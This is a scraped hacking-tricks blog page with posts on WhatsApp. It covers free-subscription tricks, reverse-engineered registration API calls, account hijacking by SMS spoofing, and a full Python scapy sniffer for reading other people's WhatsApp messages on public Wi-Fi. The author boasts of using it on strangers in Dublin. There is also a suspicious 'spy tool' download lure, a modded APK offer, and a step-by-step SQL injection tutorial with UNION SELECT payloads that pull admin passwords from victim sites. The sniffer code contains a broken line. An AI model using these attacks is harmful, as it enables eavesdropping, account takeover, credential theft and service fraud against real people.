FREE MOBILE RECHARGE | For latest useful tricks visit Here!

Steps to Get WhatsApp Subscription for 10 Years

Steps to Get WhatsApp Subscription for 10 Years !

1. First you need to Delete you WhatsApp Account from your Phone.

2. now you will need to look for a Friend or Anyone who has Apple Iphone or Ipad Any Version it may be

3. Then you need to Register WhatsApp with your Number on his Iphone or Ipad.

4. Now After entering you Number on Iphone/Ipad, you will get a Verification code on your Mobile, Just Check your inbox, and Enter the Verification code on Iphone/Ipad

5. After these Steps WhatsApp will load and Start on Iphone, just Check WhatsApp Account and it will have Paid Subscription will 2022.

Now Final Step: By this You have got Paid WhatsApp Subscription till 10 years.

Now you Simple Need to Delete your Account from Iphone/Ipad. and Simply Then downlaod the WhatsApp on Any Device which it supports and Enter your Number then verify It. you will see you have got 10 Years of WhatsApp Free

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

2 comments:

Whatsapp Hack

I have heard that whatsapp is not encrypted ( its an app like viber) and that when you sign up for a number hte code is generated within your phone sent to whatssapp servers and then sent to you. because it is not encrpted you can intercept it from your phone I have been trying to figure it out for days saw many links, does anyone have any advice ? here are two posts I found on the internet that might help. They used to have this thing where all you had to do was put your phone in airplane mode and the activation code would be in your outbox not sent, but that wont work anymore.

A few weeks ago I also tried to look a little bit into WhatsApp but had to give up because of my final exams at school.

I used the Symbian S40 Client and decompiled the .jar you can find via google to look a little bit into it.
I'm not a programmer but had done some "Hello World" stuff on Java before so I tried to understand a little bit what is going on in the Client. (In the following work I always pretended to be an Nokia C3-00 just that you know when it appears i.e. in the User-Agent)


I don't know if it's helpful for you but I will try to share the things I found out by looking into the code even though I can't gurantee they are right:


The first thing is the login-Name and the password needed to login:

Matching with reports from some other threads here and in other forums the login name I found was some sort of:
Code:

international area code without the 0's or + in the beginning + phone number without the first 0 + @s.whatsapp.net


For example if you live in germany and having the phone number 017612345 it would be 4917612345@s.whatsapp.net -> 0049 for germany without the 0's and the phone number without the 0.


The Password is set during the registration process but usually it is an transformation of the IMEI of your phone (in case you don't want to stand out you should also do it like this). I must admit I don't exactly know how this transormation works but I have the code that does it.

I just wrapped it _very dirty_ in a standalone Java program to test it. source: http://pastebin.com/npbwcj1s
I really don't know what it exactly does and didn't look deeper into it but it isn't a "real" md5 I think... (Maybe someone who knows how to create an MD5 in Java can look at it what is different except the reverse of the imei?)


The second thing I searched for is the registration process.

With this I got so far that I got an Registration-Code and I also get the response from the Server that the account exists but I can't login because I hadn't enough time to look excatly at the login process. Just logging in via XAMPP in Pidgin doesn't work expectedly

The registration process works this way: (no gurantee that it is right and don't try it with your "real" number. I tried it with an old SIM I had lying around)


0) All these API-Request are done with an User-Agent like:

Code:

WhatsApp/2.1.0 S40Version/04.60 Device/nokiac3-00


The Code generating this is:
http://pastebin.com/K79wrfnS
I used information I found in the web to fill the information for the Nokia C3-00.
As said by the pw: I don't think you really have to fake it to look like this but it maybe makes it harder to find you.

1) The first step ist requesting the Registration-code from the Server (the Code you get i.e. via SMS)


The API-call looks like this:

Code:

https://r.whatsapp.n...0000&method=sms


The Arguments are as following:

cc = area code without 0's
in = number without first 0
to = number where the sms or call should go to (maybe security weakness?)
lc/lg = Language-Code(?) splittet up - e.g. DE_de goes to lc=DE&lg=de US_en would be lc=US&lg=en
mcc/mnc/imsi = Should be the "Mobile Country Code", "Mobile Network Code" and the "Mobile Subscriber Identification Number"
-> I don't know how to get to them and the App has as "fallback" just the 0's in it when the system-request for them fails so it should work with the 0's (and it does)

The metod is maybe the most interesting thing.

There are 3 methods: self, sms and voice
When choosing sms you get the Code via SMS as you may know it, choosing voice you get a call at the to-number where it reads the code (I didn't test but it would match with informations you find at some other places in the web). I don't know what self exactly does and I didn't really looked for it because the SMS-Way seemed the best for me, especally because I just wanted to know my Code :>

The Answer after calling the API is an xml saying:

Code:

<code><response status="sucess-sent" result="30"></code>


What error-Messages look like I don't know because it worked for me (and I just looked into the code again and I didn't find any code that works with an specific error, it just closes the App when an error occurs if I'm right) ^^


Also you should get an sms (in case you used the method sms) at the "to" number conatining the WhatsApp-Code which looks like this:

Code:

WhatsApp code abc


abc is the necessary Code


2) With the given code you can then register your Whatsapp-Account


API-Call:

Code:

https://r.whatsapp.n...d=asdf&code=abc


cc/in = the same as in code.php

udid = the calculated password as explained in the login-data
code = the just recieved WhatsApp-Code

The XML response looks like:

Code:

<register> <response status="ok" login="4917612345" result="new" /> </register>


The login-value is your login-Name for the connection and built like explained.

I think that there are error-messages when the account already exists etc. but as said: I didn't have more time and It worked ^^

3) As third API-call you can check if an accounts exists. This isn't necessary for registration I think.


API-call:

Code:

https://r.whatsapp.n...12345&udid=asdf


Parameters are the same like above.


Resonse when account with this number and pw exists:

Code:

<exist><response status="ok" result="4917612345" /></exist>


The result again gives the login-name for this account.

I did some tests with this and even though I didn't save the exact answers I found out that it just checks if the account with the given number and the given pw exisists. You can't check if another numer has an WhatsApp-Account with this API-call. (or I just was to stupid to find out how to do this)


The last thing I searced for before studing for my exams was the server connection.


It Baisicly is - as said everywhere - an XAMPP Connection. At least it looks like.

I think there are some small differences between the default XAMPP and the way WhatsApp does it.

But nevertheless the URL I found to where it tries to connect is:

Code:

socket://bin-short.whatsapp.net:5222


When connecting to the URL with Pidgin and default XAMPP it also gets an connection but the connection gets closed by the server after sending the xml and xampp information.

When I connected to a "default" XAMPP server after these two "sendings" the Client gets an response from the Server.
WhatsApp instead sends the Auth directly after the features so I think the Server quits the connection because Pidgin is waiting for Information and the Server also is waiting for information.

The Login-Process in the WhatsApp-Code looks like:

Code:

out.streamStart(connection.domain, connection.resource);

System.err.println("sent stream start");
sendFeatures();
System.err.println("sent features");
sendAuth();
System.err.println("sent auth");
in.streamStart();
System.err.println("read stream start");
String challengeData = readFeaturesAndChallenge();
System.err.println("read features and challenge");
sendResponse(challengeData);
System.err.println("sent response");
readSuccess();

Because WhatsApp uses a "default" XAMPP-Libary which is just modified and the default functions are still there I think the default Login-Process of XAMPP looks like:

Code:

send1();

send2DigestMD5Mechanism();
read1();
String challenge = read2Challenge();
send2SASLResponse(challenge);
send2UselessResponse();
read2Challenge();
read2();
send3();
read3();
send4();
send5();

-> as said, after the send1 and 2 (which are doing baisicly the same as the streamStart and sentFeatures in the WhatsApp-Version) it waits for information instead of sending the Auth.


Here I stopped working on it because of the exams. I think it should be not too difficult to make a login work when completely re-writing the Original functions.

Just as orientation the whole (sub)class of the WhatsApp-Login: http://pastebin.com/X8gv2XRU


Thats all I did up to now (or more exactly before my exams).

I would really like to see somebody working on this and making it work on the N900. At first I wanted to look at it again after the exams but eventhough I finished my exams two weeks ago I didn't found the time to work on this and because I'm not a programmer it also would take at least a _very_ long time to work, if it would work at all


If some beta-testers are searched for the programm I would really like to test it from a hobby-programmer or more non-programmer point of view




PS: Eventhough I personally don't like it when people ask for forgiveness for their bad english I would like to do the same right now

I'm from Germany and not really good in languages. I really hope my text ist readable and you understand what I wanted to say with it ^^ (if you don't understand something feel free to ask what it was meant to say )

and then I found this :


How to hack WhatsApp Messenger on Nokia, iPhone & Android


shareshareshareshare


WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.


In this article i will talk about alternative methods of hi-jacking WhatsApp messages and other protocols using a variety of methods.


The first hack im going to talk about will spoof WhatsApp and have it think you are somebody else allowing you to communicate under an alternative name. This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. This method is also known to work on several other IM applications based on iOS, Symbian & Android devices.

Hack 1

Install WhatsApp on your device


WhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.


WhatsApp now offers an alternative method of verification


Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.


Next we need to do some SMS-Spoofing


There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.

If you are using an iPhone use the following details in the SMS spoofer application.

To: +447900347295

From: +(Country code)(mobile number)
Message: (your email address)

If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.


You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Hack 2

The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.


You will also need to parse the traffic so check this link:
http://www.secdev.org/projects/scapy/

Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.

Example
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

DYN:~/whatsapp# python sniffer.py wlan0


#########################

## whatsapp sniff v0.1 ##
#########################

[+] Interface : wlan0

[+] filter : tcp port 5222

To : ***********

Msg : Hello, I will send you a file.

To : **********

Filename : .jpg
URL : https://mms*.whatsap...3/*md5hash*.jpg

From : ***********

Msg : Thanks file has been recieved, take this file too.

From : ***********

Filename : .jpg
URL : https://mms*.whatsap...1/*md5hash*.jpg
Code

You can grab the code on the downloads page
http://insanitypop.com/downloads/ or view it below:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

#!/usr/bin/env python


import os

import sys
import scapy.all
import re

Previous_Msg = ""

Previous_Filename = ""
Files = []
Messages = []
Urls = []

def banner():

print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"

def whatsapp_parse(packet):

global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")

# Target Sending stuff

if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)

# Recieved Messages

if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)

def main():

banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"

print "[+] Interface : ", scapy.iface

print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)

print "[+] iface %s" % scapy.iface


if __name__ == "__main__":

main()

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

10 comments:

WHATSAPP HACK - SPY TOOL - With PROOF! [FEBRUARY 2013] NO SURVEYS

WATCH THIS AWESOME VIDEO ON WHATSAPP HACKING USING SPY TOOL

MANY OF YOU ARE NOT BEING ABLE TO SEE THIS VIDEO AS YOUTUBE TEAM HAVE DELETED THIS FROM THEIR SITE.

BUT YOU CAN STILL WATCH THIS AWESOME VIDEO AT BELOW LINK
VIDEO LINK



DOWNLOAD SPY TOOL


NOTE: Adobe Flash player needed for downloading.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

29 comments:

WhatsApp PLUS .APK v3.05 (Mod version) Android [Full] [Free]

WhatsApp PLUS .APK v3.05 (Mod version) Android [Full] [Free]
 
WhatsApp+PLUS+3.05 WhatsApp PLUS .APK v3.05 (Mod version) Android [Full] [Free]
FREE APK WhatsApp PLUS v3.05 MOD VERSION Full Android version, you can download WhatsApp PLUS .Apk Android 3.05 full free download WhatsApp PLUS v3.05 for Android in format .Apk, WhatsApp PLUS. APK, full version of the App WhatsApp PLUS .Apk Android WhatsApp PLUS v3.05.

smartphone messenger available for Android, BlackBerry, iPhone, Windows Phone and Nokia phones.
apkpro.net
Updated: 14 february 2013
Current Version: 2.9.1547 Mod
Requires Android 2.1 and up
Category Communication
WhatsApp Apk uses your 3G or WiFi (when available) to message with friends and family. Switch from SMS to WhatsApp to send and receive messages, pictures, audio notes, and video messages. First year FREE! ($1.99/year after)
Remember to previously uninstall whatsapp if you come from the official version (if not you will get the “not installed” error)
Whatsapp Apk features
NO HIDDEN COST: Once you and your friends download the application, you can use it to chat as much as you want. Send a million messages a day to your friends for free! WhatsApp uses your Internet connection: 3G/EDGE or Wi-Fi when available.
MULTIMEDIA: Send Video, Images, and Voice notes to your friends and contacts.
GROUP CHAT: Enjoy group conversations with your contacts.
NO INTERNATIONAL CHARGES: Just like there is no added cost to send an international email, there is no cost to send WhatsApp messages internationally. Chat with your friends all over the world as long as they have WhatsApp Messenger installed and avoid those pesky international SMS costs.
SAY NO TO PINS AND USERNAMES: Why even bother having to remember yet another PIN or username? WhatsApp works with your phone number, just like SMS would, and integrates flawlessly with your existing phone address book.
NO NEED TO LOG IN/OUT: No more confusion about getting logged off from another computer or device. With push notifications WhatsApp is ALWAYS ON and ALWAYS CONNECTED.
xrwnf 543679 WhatsApp PLUS .APK v3.05 (Mod version) Android [Full] [Free]
NO NEED TO ADD BUDDIES: Your Address Book is used to automatically connect you with your contacts. Your contacts who already have WhatsApp Messenger will be automatically displayed under Favorites, similar to a buddy list. (You can of course always edit Favorites any way you like)
OFFLINE MESSAGES: Even if you miss your push notifications or turn off your phone, WhatsApp will save your messages offline until you retrieve them during the next application use.
AND MUCH MORE: Share location, Exchange contacts, Custom wallpaper, Custom notification sounds, Landscape mode, Precise message time stamps, Email chat history, Broadcast messages and MMS to many contacts at once and much much more!
Changelog  WhatsApp PLUS v3.05 

Credits to rafalense
Base updated: 2.9.1547 (Fix for unable to send message when there are less than 7 days remaining of service)
Pics MODs reorganized, moved to Chat screen MODS (named ’1.3 Pics’). Participant text size MOD moved to 1.2.21
Now if WhatsApp profile pic doesn’t exist, contact phone photo will be shown (in chat screen)
Added MOD 1.3.4 to show contact phone photo instead of WhatsApp profile photo (for the moment only in chat screen, pic quality to be improved)
WhatsApp+ changelog now will show a dialog (as this one) with changelog list instead of opening evernote link
Other minor bugs corrected.

Download WhatsApp PLUS Holo.APK Android [Full] [Free]
DOWNLOADDownload WhatsApp PLUS.APK Android [Full] [Free]


Source-APKLOAD

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

1 comments:

WEBSITE HACKING BY SQL INJECTION [EASY STEPS]

What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?


* ByPassing Logins

* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

So, here we go.


Step 1: Finding Vulnerable Website:

To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork

http://www.ziddu.com/download/13161874/A...t.zip.html

Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.




Note:if you like to hack particular website,then try this:

site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For eg:

http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:

Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by
n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".


For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.

For eg:
http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:

We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).


For eg:

if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.


Step 5: Finding version,database,user

Replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.


For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name

If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"


For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin " table.


Step 7: Finding the Column Name


Now replace the "group_concat(table_name) with the "group_concat(column_name)"


Replace the "
from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .


Install the HackBar addon:

https://addons.mozilla.org/en-US/firefox/addon/3899/


Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.


Select sql->Mysql->MysqlChar() in the Hackbar.



It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'admin'.




Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.




Copy and paste the code at the end of the url instead of the "mysqlchar"


For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(
columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"


For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.

If we got luck, then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.


Step 8: Finding the Admin Panel:

Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.

Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above steps against third-party websites.  If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.

In this article, i just explained how to attack SQL injection vulnerable site in a n00b(newbie) way. If you want to become Pen-tester, you must know how these attacks works. In my next article, i will explain the SQL Injection depth.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

1 comments:

Hack a Website in Four Easy Steps

Every wondered how Anonymous and other hacktivists manage to steal the data or crash the servers of websites belonging to some of the world biggest organisations? Thanks to freely available online tools, hacking is no long the preserve of geeks, so we've decided to show you how easy it is to do, in just four easy steps.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

0 comments:

Account theft still possible with latest WhatsApp

Recent changes to WhatsApp, which appears to have captured a position as the popular app-based alternative to texting, have not actually secured the system, at least for Android users. In a test by heise Security, it was found to still be possible to take over an account unnoticed and send and receive WhatsApp messages on behalf of that user.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

2 comments:

Anonymous Leaked Account Data for 4,000 Bank Executives on a Government Website

Anonymous appears to have published login and private information from over 4000 American bank executive credentials its Operation Last Resort, demanding US computer crime law reform.

Following attacks on U.S. government websites last weekend, Anonymous seems to have made a new "Operation Last Resort" .gov website strike Sunday night.
Anonymous appears to have published login and private information from over 4,000 American bank executive accounts in the name of its new Operation Last Resort campaign, demanding U.S. computer crime law reform.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

1 comments:

HACK 10 YEARS SUBSCRIPTION OF WHATSAPP [FOR ANDROID]

Gadget needed :
A. Iphone / Ipad [Borrow your friend's phone  ]
B. Your own android phone


How to extend:
1. Register your Android WhatsApp phone number on WhatsApp for iPhone (doesn't need to change the sim card, just register the number).

2. Enter 3 digit SMS code sent to your sim card and enter it on WhatsApp for iPhone.

3. Re install whatsapp for Android, then register your number that already registered in iPhone and you will get 10 years license.

ENJOY GUYS..:)

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

3 comments:

GET 10 YEAR SUBSCRIPTION FOR WHATSAPP

WhatsApp 10 Year Subscription for BlackBerry, Android and Etc
BlackBerry:
If you have a BlackBerry and WhatsApp, you noticed that WhatsApp only gives you a year worth of service for free, while if you have the Android version or iPhone version, you just pay a one time fee and it’s yours. Unless if you get lucky and got it for free for a limited time for the holiday. However, the competition is fierce these days, especially when ChatOn by Samsung will be available for the BlackBerry. What if Samsung gives ChatOn for free for BlackBerry users? I’ll show you how to get 10 years worth of subscription on your BlackBerry for WhatsApp by using the same number you registered before.
So how do you Whatsapp 10 year worth of subscription? What it requires and why it works? You need the latest WhatsApp version for your BlackBerry by going to whatsapp.com. This is actually a bug, maybe a temporary bug from WhatsApp server, but I’ve tried this within a week and I got the same positive result. For now, I’ve tested on a few BlackBerry, Bold 9100, Torch 9800 and Pearl 9105. I will soon test it on Dakota and Bellagio. What it require is that you might need an assistance from one of your family member or friend who has either an iPhone or Android phone. Kindle Fire will not work with WhatsApp.

Requirements before Step 1: Latest WhatsApp on your BlackBerry. Borrow an iPhone or Android with WhatsApp installed

Step 1. How is this going to work is that you use the iPhone or Android to register your existing BlackBerry phone number onto the iPhone or Android. Register your BlackBerry number on to the iPhone or Android.
Step 2. On your BlackBerry, you will receive an sms code to register WhatsApp on the iPhone or Android. You use that code to verify WhatsApp on the iPhone or Android. Don’t worry, this is just for temporary.
Step 3. Now Open WhatsApp on your BlackBerry by clicking on the BlackBerry icon button and select Settings. Click on the BlackBerry icon button again while in Settings and click on Change Phone Number. Enter in your BlackBerry phone number and let it do it’s verification. After verification is done, click on the BlackBerry button and go to Account Info and Expiration year will be 2022.

That’s pretty much it, so all you have done is spoofed WhatsApp with another phone such as Android or iPhone and then re-register your BlackBerry number on the BlackBerry to get or extend WhatsApp subscription to 10 years for free. WhatsApp gives 10 years to new users for Android user and a lifetime for iPhone users. Previous users for BlackBerry and Android only get a year of trial, unless if you are a new user to WhatsApp, then you will automatically get up to 2021, if you register the latest August of 2011.

This only works only on the BlackBerry since it has service expiration date, and it might work on other devices that has expiration date for WhatsApp.

Troubleshoot:
If verification fails after 9 times, it will time out. This is only in resulting if your WhatsApp is not the latest version for your BlackBerry. You should delete the WhatsApp on your BlackBerry and download the latest from whatsapp.com.


Summary:
1. Register your BlackBerry number onto the WhatsApp on the iPhone or Android
2. Enter the 3 Digit SMS Code that is sent to your BlackBerry and enter it in on WhatsApp for iPhone or Android
3. Re-Register your BlackBerry number in WhatsApp on your BlackBerry and from there you should get 10 years.

Update: For those who wants to trick Whatsapp with an Android Device, you would have to delete Whatsapp app on your Android device and re-install it with the BlackBerry number. All your Chat History will be gone. It’s more tedious with an Android Phone. With the iPhone, chat history will not be deleted and there is no need to uninstall Whatsapp to change number.
Tested and so far works on: Android, Blackberry, Symbian and Windows Phone.
Anybody can do this for you remotely, all they have to do is do the following below:
Send your Number to the person who has iPhone or Android to help you out. Then have him/her register your number with their iPhone or Android and tell him/her the SMS you received since he/she is using your number to activate Whatsapp. After he/entering your number, he/she needs to log out by registering his/her original number. Then you need to re-register Whatsapp on your Phone and you’ll get the 10 years service on Android, BlackBerry, Symbian or Windows Phone.

SHARE THIS POST   

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author: Anonymous

6 comments: